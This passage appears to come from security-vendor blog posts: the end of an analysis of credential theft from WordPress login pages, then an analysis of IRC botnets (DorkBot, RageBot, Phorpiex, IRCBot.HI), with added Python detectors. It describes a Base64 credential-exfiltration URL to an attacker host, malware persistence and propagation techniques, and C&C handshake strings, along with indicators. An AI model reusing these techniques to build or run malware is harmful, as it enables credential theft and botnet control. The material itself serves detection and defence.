On decoding the encoded string highlighted above we see that it’s relaying the stolen user credentials using the GET request. The format of this GET request is

"www.conyouse[.]com/scr.js?callback=jQuery<random number>&data=<BASE64_ENCODED_CREDENTIALS>&_=<random number>"

Base64 decoded data string

The complete sequence of action captured is shown in below screenshot.

Complete exploit cycle
The end user is oblivious to the fact that the credentials were leaked to the attacker's site, because they are then logged in to the WordPress site as normal.
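For defenders who have proxy logs rather than the page itself, here is an added Python detector (not code from the post) for the exfiltration pattern above. It parses lines of the form “client GET url”, Base64-decodes any “data” query parameter, and flags requests whose decoded body is a serialised WordPress login form, reporting the destination host and the affected username without retaining the password. The log lines are constructed; the exfiltration host used in them is the one named in the post, and the field names “log” and “pwd” are the ones WordPress's login form uses.

```python
"""Detect the WordPress credential-exfiltration GET described above in proxy logs.

Added example, not code from the post. The stolen form is serialised (the
WordPress login form fields are 'log' and 'pwd'), Base64-encoded and sent as
the 'data' parameter of a JSONP-style GET. The detector flags any request
whose 'data' decodes to a form body containing 'pwd='. Log lines are
constructed for the example.
"""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

LINE_RE = re.compile(r"^(?P<client>\S+)\s+(?P<method>GET|POST)\s+(?P<url>\S+)")


def _b64_decode_loose(blob: str) -> Optional[bytes]:
    """Base64-decode a value that travelled in a query string.
    parse_qs turns an unescaped '+' into ' ', so put it back, then fix padding."""
    blob = blob.replace(" ", "+")
    try:
        return base64.b64decode(blob + "=" * (-len(blob) % 4))
    except (binascii.Error, ValueError):
        return None


def extract_exfil(url: str) -> Optional[dict]:
    """Return host, path, username and field names if url carries a Base64
    form body with a password field; otherwise None."""
    parts = urlsplit(url)
    for blob in parse_qs(parts.query).get("data", []):
        raw = _b64_decode_loose(blob)
        if raw is None:
            continue
        try:
            body = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        fields = parse_qs(body)
        if "pwd" in fields:  # serialised #loginform always carries pwd=
            return {
                "host": parts.hostname,
                "path": parts.path,
                "user": fields.get("log", [""])[0],
                "fields": sorted(fields),
            }
    return None


def scan_log(lines):
    """Return (client, exfil_host, username) for every matching request."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        found = extract_exfil(m["url"])
        if found:
            hits.append((m["client"], found["host"], found["user"]))
    return hits


# Constructed sample: what jQuery's serialize() of #loginform looks like, Base64'd.
_FORM = ("log=editor&pwd=Winter2015!&wp-submit=Log+In"
         "&redirect_to=http%3A%2F%2Fexample.org%2Fwp-admin%2F&testcookie=1")
_DATA = base64.b64encode(_FORM.encode()).decode()
SAMPLE_LOG = [
    "10.0.0.5 GET http://example.org/wp-login.php",
    f"10.0.0.5 GET http://www.conyouse.com/scr.js?callback=jQuery1110023&data={_DATA}&_=1431980001234",
    "10.0.0.9 GET http://cdn.example.net/jquery.min.js?data=bm90aGluZw==",
]

if __name__ == "__main__":
    for client, host, user in scan_log(SAMPLE_LOG):
        print(f"{client} leaked WordPress credentials for {user!r} to {host}")
```

The rule keys on the decoded content rather than on conyouse.com, so it keeps working when the collection domain changes; the cost is one Base64 decode per request that carries a “data” parameter, which is cheap.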

WordPress, being one of the most popular content management and blogging platforms, remains an attractive target for cybercriminals due to its large user base. While the initial vector behind the compromise of the sites listed in this blog is unclear, it is extremely important for site administrators to keep their WordPress sites patched with the latest security updates.

Analysis by - Sameer Patil & Deepen Desai

Thursday, April 23, 2015

IRC Botnets alive, effective & evolving

An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel. It usually involves a Botnet operator controlling the IRC bots through a previously configured IRC server & channel. The Botnet operator, after appropriate checks, periodically moves the IRC bot to a new IRC channel to thwart researchers & automated sandboxes from monitoring the commands.

In this blog, we will look at one of the most prevalent IRC based malware families - DorkBot, followed by three additional IRC Botnet families - RageBot, Phorpiex, and IRCBot.HI.

DorkBot Installer
In our telemetry data from the last 3 months, we have seen the following URL serving the DorkBot installer:
api1[.]wipmania[.]com[.]wipmsc[.]ru/api1[.]gif  (Check APPENDIX section for additional info.)
The malware executable checks for two command line arguments:
  • "-aav_start" - it terminates
  • "-shell" - it starts the infection cycle, creates a registry key "Windows Update" to ensure persistence, and creates a mutex named Windows_Shared_Mutex_231_c000900 to ensure only one copy of DorkBot is running
If no command line argument is provided, it starts injecting threads into other processes without performing the above-mentioned actions.

It first injects a thread into svchost.exe and performs the following actions:
  1. Copies itself as "%APPDATA%\Update\Explorer.exe" on the infected system.
  2. Creates a Run registry key with the name of "Windows Explorer Manager" for the dropped executable copy.
  3. It creates a thread that monitors the Run key created in step 2 & recreates it if missing, every 10,000 seconds.
  4. It also creates a thread that copies the file created in step 1 to file name “\c731200” in the "%APPDATA%” folder.
  5. It then creates a remote thread in mspaint.exe that tries to resolve a predetermined list of domains as shown in image below:
DorkBot - Hardcoded Domains
The main Dorkbot binary (MD5-E7E48AD1A2A57CC94B56965AA8B476DA) was found embedded in the resource section which is extracted and executed at runtime.

DorkBot - memory strings
It also creates a remote thread in the “calc.exe” process that performs the following actions:
  1. Creates a mutex with the name “c731200”
  2. Checks for Internet connectivity using API InternetCheckConnection with www.google.com as the URL.
  3. It then tries to download files from 20 different URLs and saves the downloaded file with random file names in the %Temp% folder. File names are shown in the screenshot below:
DorkBot- Random file names
All the URLs are hardcoded in the DorkBot and are encrypted via a custom encryption method.
DorkBot - Encrypted URLs
DorkBot - Pseudocode of decryption function

Below is the full list of URLs from which it tries to download additional malware:


DorkBot represents a family of information-stealing worms that use IRC-based Command & Control (C&C) communication. DorkBot is also known as ngrBot due to its similar feature set. It is one of the most capable IRC-based botnets and generates revenue for the botnet operator via the following features:
  • Capable of spreading via chat messengers, USB drives, & social networking sites
  • Supports multiple Distributed Denial of Service (DDoS) attack types
  • Capable of stealing login credentials for multiple HTTP and FTP sites
  • Blocks security update related websites to evade detection
  • Capable of downloading, installing and uninstalling other malware payloads
RageBot, Phorpiex, and IRCBot.HI Analysis
From our 3 months of telemetry data, we have seen the following URLs serving these IRC bots:

[Table: malware name and serving URL]

In addition to IRC based C&C communication, all these bots have following similarity in their operation:

1. Checks execution environment - Virtual Environment, Honeypot or Sandbox

RageBot - Check via Username
As seen in the screenshot above, Ragebot is checking for common usernames found in certain public sandboxing environments before executing further.

Phorpiex - Check via DLL name
Phorpiex bot looks for strings like 'qemu', 'virtual', and 'vmware' in system registry to check for execution in Virtual Environment. In addition, it also checks for the presence of Sandboxie sandbox environment by looking for specific DLLs as seen in the screenshot above.

IRCBot.HI - Check via DLL & Product IDs
It is important to note that IRCBot.HI checks the ProductID value from the registry against multiple hardcoded ProductID values. It terminates execution if any of them matches. We believe that these hardcoded ProductIDs were harvested from various online public sandboxes.

2. Creates Mutex
RageBot – It creates a mutex with the name “ie”

RageBot - Mutex

Phorpiex – It creates a mutex with the name “t2”. We have also seen some Phorpiex samples that create mutexes with the names “t3” and “t4”.

Phorpiex - Mutex

IRCBot.HI – During installation it creates a mutex with the name MAIN_<RandomNumber>. When it runs from the installation path, it creates a mutex with the name BACKUP_<RandomNumber>.

IRCBot.HI - Mutex
3. Installation

RageBot- It installs itself in “%ProgramFiles%\Common Files\System” or “C:\DOCUME~1\” directory. The malware uses ragebot.exe as file name for the dropped file.
RageBot – Building installation path
If it is unable to create the file at the above-mentioned locations, it tries to install itself in the “C:\RECYCLER” directory.

Phorpiex – It installs itself into the %WINDIR%, %USERPROFILE%, %APPDATA% and %TEMP% locations by creating a folder named “M-50504578520758924620” containing a file named winmgr.exe.
Phorpiex – Pseudocode of Installations function 
It then deletes itself after installation by running a batch file dropped in the %TEMP% folder.

IRCBot.HI – During our analysis it installed itself into %WINDIR% and %USERPROFILE%. In %WINDIR%, it creates a folder named 1756410959 and drops a copy of itself as lsass.exe. In %USERPROFILE%, it drops a copy of itself as ctfmon.exe.

IRCBot.HI – Installing in different locations

4. Adding an autostart entry using the Run registry key

RageBot – Creates a Run key under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run with the value name “Windows Update”

Phorpiex – Creates a Run key under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run with the value name “Microsoft Windows Manager”

IRCBot.HI – Creates a RunOnce key under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce with the value name “*<RandomNumber>”
IRCBot.HI – RunOnce Entry
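The mutex names, drop locations and Run/RunOnce entries from points 2 to 4 are enough for a quick host-side triage. The following Python is an added example written for this page, not tooling from ThreatLabZ or anything taken from the bots: it matches a host snapshot (mutex names, exported Run-key entries, file paths) against those indicators. The indicator strings are the ones stated above; the function names, the input shape and the sample snapshot are this example's own assumptions, the Run-key match accepts either hive although the write-up names HKEY_LOCAL_MACHINE, and the ctfmon.exe rule (flag the name only outside the Windows directory) is a heuristic added here.

```python
import re

# Added example: host triage against the persistence artifacts described in the write-up.
# Indicator strings come from the analysis text; helper names, input shapes and the
# constructed sample snapshot are this example's own assumptions.

# Point 2: mutex names. Exact names for RageBot/Phorpiex, a pattern for IRCBot.HI.
EXACT_MUTEXES = {"ie": "RageBot", "t2": "Phorpiex", "t3": "Phorpiex", "t4": "Phorpiex"}
IRCBOT_MUTEX = re.compile(r"^(MAIN|BACKUP)_\d+$")

# Point 4: value names under ...\CurrentVersion\Run and ...\RunOnce. The write-up names
# HKLM; matching on the key suffix also catches the same value under HKCU (assumption).
RUN_SUFFIX = r"\software\microsoft\windows\currentversion\run"
RUN_VALUES = {"windows update": "RageBot", "microsoft windows manager": "Phorpiex"}
IRCBOT_RUNONCE = re.compile(r"^\*\d+$")  # "*<RandomNumber>"

# Point 3: dropped-file locations. Paths are lower-cased with backslashes before matching.
PATH_RULES = [
    (re.compile(r"\\ragebot\.exe$"), "RageBot"),
    (re.compile(r"\\m-50504578520758924620\\winmgr\.exe$"), "Phorpiex"),
    (re.compile(r"\\1756410959\\lsass\.exe$"), "IRCBot.HI"),
]
# IRCBot.HI drops ctfmon.exe directly in %USERPROFILE%; the legitimate one lives under
# the Windows directory, so a copy at the profile root is flagged (heuristic, assumption).
PROFILE_DROP = re.compile(r"^[a-z]:\\(users|documents and settings)\\[^\\]+\\ctfmon\.exe$")


def _norm(path):
    return path.replace("/", "\\").lower()


def check_mutexes(mutex_names):
    hits = []
    for name in mutex_names:
        if name in EXACT_MUTEXES:
            hits.append((EXACT_MUTEXES[name], "mutex", name))
        elif IRCBOT_MUTEX.match(name):
            hits.append(("IRCBot.HI", "mutex", name))
    return hits


def check_run_keys(entries):
    """entries: iterable of (key_path, value_name, data) as exported from the registry."""
    hits = []
    for key, value, data in entries:
        k = _norm(key)
        if k.endswith(RUN_SUFFIX) and value.lower() in RUN_VALUES:
            hits.append((RUN_VALUES[value.lower()], "run-key", f"{value} -> {data}"))
        elif k.endswith(RUN_SUFFIX + "once") and IRCBOT_RUNONCE.match(value):
            hits.append(("IRCBot.HI", "runonce-key", f"{value} -> {data}"))
    return hits


def check_paths(paths):
    hits = []
    for p in paths:
        n = _norm(p)
        for rule, family in PATH_RULES:
            if rule.search(n):
                hits.append((family, "file", p))
                break
        else:
            if PROFILE_DROP.match(n):
                hits.append(("IRCBot.HI", "file", p))
    return hits


def triage(mutexes, run_entries, paths):
    """All indicator hits for one host snapshot, grouped by family."""
    by_family = {}
    for family, kind, evidence in check_mutexes(mutexes) + check_run_keys(run_entries) + check_paths(paths):
        by_family.setdefault(family, []).append((kind, evidence))
    return by_family


# Constructed host snapshot (not real telemetry): one artifact of each family plus benign entries.
SAMPLE_MUTEXES = ["ie", "MAIN_4821", "Global\\SomeLegitApp", "t3"]
SAMPLE_RUN = [
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Windows Update",
     r"C:\Program Files\Common Files\System\ragebot.exe"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce", "*17564",
     r"C:\Windows\1756410959\lsass.exe"),
]
SAMPLE_PATHS = [
    r"C:\Windows\System32\lsass.exe",                                      # legitimate
    r"C:\Windows\1756410959\lsass.exe",                                    # IRCBot.HI drop
    r"C:\Users\alice\ctfmon.exe",                                          # IRCBot.HI drop in %USERPROFILE%
    r"C:\Users\alice\AppData\Roaming\M-50504578520758924620\winmgr.exe",  # Phorpiex drop
]

if __name__ == "__main__":
    for family, evidence in sorted(triage(SAMPLE_MUTEXES, SAMPLE_RUN, SAMPLE_PATHS).items()):
        print(family)
        for kind, detail in evidence:
            print(f"  [{kind}] {detail}")
```

A hit on the Run value name alone is worth reviewing rather than acting on, which is why the image path is kept in the evidence string: the names “Windows Update” and “Microsoft Windows Manager” were chosen to look ordinary.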
5. Adding itself to Windows Firewall trusted application list 
All these bots add themselves to the Windows Firewall’s exception list by modifying the key
6. Propagation methods

RageBot – 
  1. It copies itself to the following P2P and instant-messenger application folders for spreading:
    • \Program Files\LimeWire\Shared
    • \Program Files\eDonkey2000\incoming
    • \Program Files\KAZAA
    • \Program Files\Morpheus\My Shared Folder\
    • \Program Files\BearShare\Shared\
    • \Program Files\ICQ\Shared Files\
    • \Program Files\Grokster\My Grokster\
    • \My Downloads\
  2. It also searches for RAR files and copies itself inside them.
Phorpiex –

    A. Creates a shortcut on a removable device
  • It checks for all removable devices
  • Copies itself with a different name
  • Creates a shortcut to an already present folder and sets the path of the shortcut to run the malicious file
  • Hides the malicious file and folder by setting the hidden attribute on both
Phorpiex - Creating Shortcuts

    B. Creates an autorun.inf file on removable devices to autorun the malicious file
  • Checks for all removable devices
  • Copies itself with the name windrv.exe
  • Creates an autorun.inf file to autorun the malicious file
Phorpiex - Creating autorun.inf file
IRCBot.HI - 
We identified Skype-related strings in memory during our analysis, which suggests that this bot is capable of spreading via Skype.
IRCBot.HI - Skype inject related string
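The two Phorpiex removable-media tricks above leave a recognisable layout on the volume: a hidden folder shadowed by a visible shortcut of the same name, and an autorun.inf whose launch target is a hidden file. The Python below is an added example for checking a volume snapshot offline; it is not code from the write-up or from the bot. The snapshot (name, is_dir, hidden) and the autorun.inf text are constructed, the helper names are assumptions, and the autorun.inf keys it reads (open=, shellexecute=, shell\<verb>\command=) are the standard ones of that file format rather than anything the page quotes.

```python
import configparser
import io
from pathlib import PureWindowsPath

# Added example: offline checks for the removable-media tricks described above.
# A "volume snapshot" is a list of (name, is_dir, hidden) tuples for the volume root,
# as a forensic tool or an attribute-aware directory listing would give you.
# The snapshot, the autorun.inf text and the helper names are constructed for this example.


def shadowed_folders(entries):
    """(folder, shortcut) pairs where a hidden folder sits beside a visible .lnk of the same
    name: the layout the shortcut trick leaves behind, where the user sees only the shortcut."""
    hidden_dirs = {name.lower(): name for name, is_dir, hidden in entries if is_dir and hidden}
    hits = []
    for name, is_dir, hidden in entries:
        if is_dir or hidden:
            continue
        p = PureWindowsPath(name)
        if p.suffix.lower() == ".lnk" and p.stem.lower() in hidden_dirs:
            hits.append((hidden_dirs[p.stem.lower()], name))
    return hits


def autorun_targets(autorun_text):
    """Files an autorun.inf would launch, read from the standard open=, shellexecute= and
    shell\\<verb>\\command= keys of its [autorun] section. Unparseable text yields []."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_file(io.StringIO(autorun_text))
    except configparser.Error:
        return []
    if not cp.has_section("autorun"):
        return []
    targets = []
    for key, value in cp.items("autorun"):  # configparser lower-cases the keys
        launches = key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command"))
        if launches and value.strip():
            targets.append(value.strip().split()[0])  # drop any command-line arguments
    return list(dict.fromkeys(targets))  # de-duplicate, keep order


def hidden_targets(entries, targets):
    """Autorun targets that are hidden files on the same volume: the combination described above."""
    hidden_files = {name.lower() for name, is_dir, hidden in entries if hidden and not is_dir}
    return [t for t in targets if PureWindowsPath(t).name.lower() in hidden_files]


def scan_volume(entries, autorun_text):
    targets = autorun_targets(autorun_text)
    return {
        "shadowed": shadowed_folders(entries),
        "autorun_targets": targets,
        "hidden_targets": hidden_targets(entries, targets),
    }


# Constructed snapshot of an infected-looking volume root (not from a real device).
SAMPLE_ENTRIES = [
    ("Photos", True, True),            # real folder, now hidden
    ("Photos.lnk", False, False),      # visible shortcut carrying the folder's name
    ("Documents", True, False),        # visible folder with a shortcut beside it: benign
    ("Documents.lnk", False, False),
    ("windrv.exe", False, True),       # hidden payload, named as in the write-up
    ("autorun.inf", False, True),
    ("report.pdf", False, False),
]
SAMPLE_AUTORUN = r"""[autorun]
open=windrv.exe
shell\open\command=windrv.exe
icon=%SystemRoot%\system32\shell32.dll,4
"""

if __name__ == "__main__":
    for key, value in scan_volume(SAMPLE_ENTRIES, SAMPLE_AUTORUN).items():
        print(f"{key}: {value}")
```

The shortcut check deliberately ignores a .lnk beside a visible folder, which is a common benign arrangement; it is the hidden attribute on the real folder that makes the pairing suspicious.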
7. IRC-based Command & Control communication
All these bots use the IRC protocol for C&C communication and perform different actions based on the commands received from the remote C&C server.

RageBot – During our analysis, this RageBot sample was trying to connect to vnc.e-qacs[.]com on port 6668. Upon successful connection, the following initial communication was observed:
RageBot - C&C Communication
The full list of C&C commands can be found in the appendix.
Phorpiex – It tries to connect to trksrv[.]su on port 5050. Other IRC servers it tries to connect to are trik[.]su, srv50[.]ru and trkbox[.]ru. Upon successful connection, it sends the following IRC commands:
    NICK `|USA|hihdlxu
    USER x "" "x" :x

Other messages and commands it handles:

    001 -> Sends a JOIN #b message to the server
    PING -> Checks status
    .j <channel name> -> Joins the given channel
    bye -> Uninstalls the bot

Phorpiex - C&C Communication
IRCBot.HI – It tries to connect to irc[.]ernsthaft[.]su or irc[.]ded-rrwqwzjzjris[.]com on port 6667. Upon successful connection, it sends the following IRC commands:

    PASS ddos
    USER <8 char string> <1 digit number> * :<8 char string>
    NICK n[USA|A|D|<OS_NAME><OS_TYPE>|1c]<8 char string>
    JOIN #PlanB

Below is a sample of the C&C communication for this bot:

IRCBot.HI - C&C Communication
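The registration sequences quoted for Phorpiex and IRCBot.HI above (NICK/USER/PASS/JOIN) are distinctive enough to match in captured IRC traffic. The Python below is an added example, not code from the write-up: it generalises the quoted samples into regular expressions (the country code, the random suffix and the field lengths are assumed to vary as the placeholders indicate), tags server-relayed PRIVMSG commands against the command vocabularies given in point 7 and in the RageBot appendix, and checks a host/port pair against the C&C servers named in point 7. Function names, the (direction, text) input shape and the constructed session are this example's own.

```python
import re
from collections import Counter

# Added example: classify a captured IRC session against the handshakes and command
# vocabularies described in the write-up. Literal samples are generalised into regexes
# (assumption: country code, random suffix and field lengths vary as the placeholders say);
# helper names, the (direction, text) input shape and the sample session are constructed.
CLIENT_SIGNATURES = [
    ("Phorpiex",  "nick", re.compile(r"^NICK `\|[A-Z]{2,3}\|\S{5,9}$")),
    ("Phorpiex",  "user", re.compile(r'^USER x "" "x" :x$')),
    ("Phorpiex",  "join", re.compile(r"^JOIN #b$")),
    ("IRCBot.HI", "pass", re.compile(r"^PASS ddos$")),
    ("IRCBot.HI", "user", re.compile(r"^USER \S{8} \d \* :\S{8}$")),
    ("IRCBot.HI", "nick", re.compile(r"^NICK n\[[^|\]]+\|[^|\]]+\|[^|\]]+\|[^|\]]+\|1c\]\S{8}$")),
    ("IRCBot.HI", "join", re.compile(r"^JOIN #PlanB$")),
]

# Operator commands: Phorpiex from point 7, RageBot from the appendix.
FAMILY_COMMANDS = {
    "Phorpiex": {".j", "bye"},
    "RageBot": {"botinfo", "rarworm", "xpl", "p2p", "vncstop", "disconnect", "reconnect",
                "reconnect.next", "nick", "restart", "part", "join", "commands", "b0tk1ller", "-s", "h"},
}

# C&C servers named in point 7, kept defanged as on the page (None = port not stated).
C2_SERVERS = {
    "RageBot": {("vnc.e-qacs[.]com", 6668)},
    "Phorpiex": {("trksrv[.]su", 5050), ("trik[.]su", None), ("srv50[.]ru", None), ("trkbox[.]ru", None)},
    "IRCBot.HI": {("irc[.]ernsthaft[.]su", 6667), ("irc[.]ded-rrwqwzjzjris[.]com", 6667)},
}

PRIVMSG = re.compile(r"^(?::\S+ )?PRIVMSG (\S+) :(.*)$")


def known_c2(host, port=None):
    """Family whose listed server matches host (and port, where the page states one), else None."""
    defanged = host.replace("[.]", ".").replace(".", "[.]")  # accept fanged or defanged input
    for family, servers in C2_SERVERS.items():
        for h, p in servers:
            if h == defanged and (p is None or port is None or p == port):
                return family
    return None


def match_registration(line):
    """(family, field) for a client->server line matching a known bot handshake, else None."""
    for family, field, rx in CLIENT_SIGNATURES:
        if rx.match(line):
            return family, field
    return None


def extract_command(server_line):
    """First word of a PRIVMSG body, which is where these bots read operator commands."""
    m = PRIVMSG.match(server_line)
    if not m:
        return None
    body = m.group(2).strip()
    return body.split()[0] if body else None


def classify_session(lines):
    """lines: iterable of (direction, text); 'C>' is client->server, 'S>' is server->client.
    Families are counted from registration signatures only: ordinary IRC words such as
    'join' or 'nick' also sit in RageBot's vocabulary, so commands alone never attribute."""
    families, signatures, commands = Counter(), [], []
    for direction, text in lines:
        text = text.rstrip("\r\n")
        if direction == "C>":
            hit = match_registration(text)
            if hit:
                families[hit[0]] += 1
                signatures.append((hit[0], hit[1], text))
        elif direction == "S>":
            cmd = extract_command(text)
            if cmd:
                for family, vocab in FAMILY_COMMANDS.items():
                    if cmd.lower() in vocab:
                        commands.append((family, cmd, text))
    return {"families": families, "signatures": signatures, "commands": commands}


# Constructed session modelled on the Phorpiex exchange above; not a real capture.
SAMPLE_SESSION = [
    ("C>", "NICK `|USA|hihdlxu"),
    ("C>", 'USER x "" "x" :x'),
    ("S>", ":irc.example.invalid 001 `|USA|hihdlxu :Welcome"),
    ("C>", "JOIN #b"),
    ("S>", "PING :irc.example.invalid"),
    ("C>", "PONG :irc.example.invalid"),
    ("S>", ":op!x@x PRIVMSG #b :.j #backup"),
]

if __name__ == "__main__":
    result = classify_session(SAMPLE_SESSION)
    print("families:", dict(result["families"]))
    for family, field, line in result["signatures"]:
        print(f"  {family:<10} {field:<5} {line}")
    for family, cmd, line in result["commands"]:
        print(f"  command {cmd!r} ({family}): {line}")
    print("server:", known_c2("trksrv.su", 5050))
```

The signatures only fire on the client side of the exchange, so a session from a legitimate IRC client joining a channel called #b is not tagged unless its NICK or USER line also follows the bot's fixed shape.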
In this era of sophisticated botnets with multiple C&C communication channels, custom protocols and encrypted communication, we continue to see a steady number of new IRC-based botnet payloads being pushed out in the wild on a regular basis. As we saw in our analysis, IRC-based botnet families continue to evolve in terms of the sophisticated features incorporated in the bots.

ThreatLabZ is actively monitoring this threat and ensuring signature coverage for Zscaler customers.


DorkBot installer URLs and MD5 hashes

Month seen  MD5  URL
Jan-15 E49B3EF80FF4DB4DB1D5220930EC7DAD api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 CC9D72663D2495779B0C81AEE34592E7 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 A98472BCAA010433A80410C3483C90E1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 EEFC72EFFD96FFD11EC2D69CD6248AC5 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 4E7149C1401F5A0BC34E3AAD6070F4BE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 5B14C029570F40BDDC73669FE4EFEFB0 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 4C54D366B04F9980F038CB6FC62603D0 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 6E4282023D6A19B27C30DB5D54CEE32C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 E7B61B2BE23167965079468DF36497EF api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 DC8CBA3F91A34F0D1EFA79BE4495B305 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 8AAD291926335F28B4402830252556F7 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 8036A36C372602CFA049996B9F5BD6AE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 7257FD6F90B5AA9BB249EA74B764A401 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 B186525826856E881E879C6C44BB2452 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 220188F1BD2E10BA0751383EA0946DBA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 2DB9BD0ABD99F3285721D358A6816737 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 EBEB072B8336F5FD35328227A60B271C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 01303BEFE5938C3C748C4E058A8A6AE9 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 82E2CA09BDEB3ABF8B70D848F66793E7 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 0B2E7AE8DF2ADA1E86A3A25FC248C6FE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 430560EBD3BE6A680BFA6409F332585B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 F79AF05D9B43F99EB6FC64DA2C129F67 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 384252746FAFF8D264E6A8CA450B6301 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 C9636239ED698834CABA78E1F9F8DB0F api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 9C42746376CC7D265D6BF554B960EDE2 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 67B08BF0F2C89DE4E0D1C36BAF7193B9 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 735B6602B4BD1D71246F43642D6873AA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 7D9AF61AE962443D586BFC8A86100B5F api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 05ABC48A4BEE624D7952954CF14F699D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 FF638ACA7D8D10ED8AD2DE1BC333123D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 AA4085182E8F10FEC8EBC3F6D3612321 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 1A54593E7C82DD1B16B7626FCB211DA1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 235E67A88907DA68BFBB9264A00A31E3 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 2CBD9428DEE885C30258BF0C38299138 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 CCDC5EC2085536160813658BE549F0B6 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 CBD732F87901EE03820DBA41D0D2895A api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 BE5E43F2786D628B7AA8689C2108247D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 5AEC4A3B3E0AEB3B13B98086FC81D797 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 6034814DB1C25A092C39F251F29B2216 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 6CAE0B51E5EAD86EEA47C4068287650A api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 451E324D3CB601E00FA041D6FDE1C4EC api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 9AEB3A097F11887D89EC08D337814B6B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 8F9F97232DBE283BC5E7B6AB4DD580B8 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 F57A08679380F3FDFD369528FE5CE854 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 F24BC22CFD12E3FDE40D06BF54F35CF1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 4BB4C19B5FC2401D45845789CC761577 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 583432D95424EC051AFE9E621DC41ACA api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 C5756AC3FE61266D326B43E904BC1A6C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 44012367D7FFA7845B59462952AB9014 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 FC506F023FF71E3ACDEE4449C43E5F1B api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 322E11B552B897ADBC9ABCE51774988E api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 EC0832E5818E4CD753C4B2675C6179A1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 63C37B2FEB0C0F71568B9771AC4DACE4 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Feb-15 7BE4749D1D1F8950F7288C67A393B7F0 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 ADDF9E2B207AD9E89DB46E81A8121882 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 3E70DB4E5F5F60F2FDE7AEC38F4B30CD api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Mar-15 268301147BC53722A898E1F38E6F026D api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
